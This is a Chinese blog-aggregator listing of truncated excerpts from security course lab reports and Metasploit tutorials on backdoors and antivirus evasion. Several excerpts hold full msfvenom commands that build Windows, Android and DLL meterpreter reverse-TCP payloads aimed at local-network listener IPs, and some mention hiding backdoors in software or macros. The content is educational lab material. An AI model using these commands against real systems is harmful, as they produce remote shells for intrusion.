Exp3 免杀原理实践 1.实验目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分) 1.2 通过组合应用各种技术实现恶意代码免杀(1分) (如果成功实现了免杀的,简单语言描述原理,不要 ...
分类:
其他好文 时间:
2018-04-07 17:45:26
阅读次数:
170
2017-2018-4 20155317《网络对抗技术》EXP3 免杀原理与实践 一、问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.实践 (1) 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利 ...
分类:
其他好文 时间:
2018-04-06 19:36:48
阅读次数:
284
20155202 张旭《网络对抗》Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 例举你知道的后门如何启动起来(win及linux)的方式? 更改名字伪装成其他程序 Linux可以使用cron ...
分类:
其他好文 时间:
2018-03-28 22:01:04
阅读次数:
254
参数说明: –p (- -payload-options)添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!(- -payload-options 列出payload选项)–l查看所有payload encoder nops。&nbs
分类:
其他好文 时间:
2018-03-06 17:02:55
阅读次数:
452
metasploit msfconsole 命令 来源 http://www.cnblogs.com/hookjoy/p/7989715.html payload的几个常用生成 payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterprete ...
分类:
Web程序 时间:
2018-02-16 16:52:51
阅读次数:
744
首先我在Kali下生成一个Android的应用程序,即apk格式的文件,用到的命令是: msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk 注释:-p:指的是在本次环境中攻击所使用的pa ...
分类:
移动开发 时间:
2017-09-21 17:57:05
阅读次数:
228
一、dll的定义 DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被 ...
分类:
其他好文 时间:
2017-09-04 09:50:40
阅读次数:
1060
本章节的后门有以下几种 windows -->使用模块“windows/meterpreter/reverse_tcp” 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.ex ...
分类:
Web程序 时间:
2017-08-30 09:55:02
阅读次数:
1987
一、环境搭建: 二、攻击流程: 攻击流程图解: 1.在kali linux中利用metasploit生成用于建立反向链接的dll文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > ...
分类:
其他好文 时间:
2017-08-12 21:24:43
阅读次数:
177
MSFVENOM常规选项 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -p ...
分类:
其他好文 时间:
2017-07-13 21:54:24
阅读次数:
165
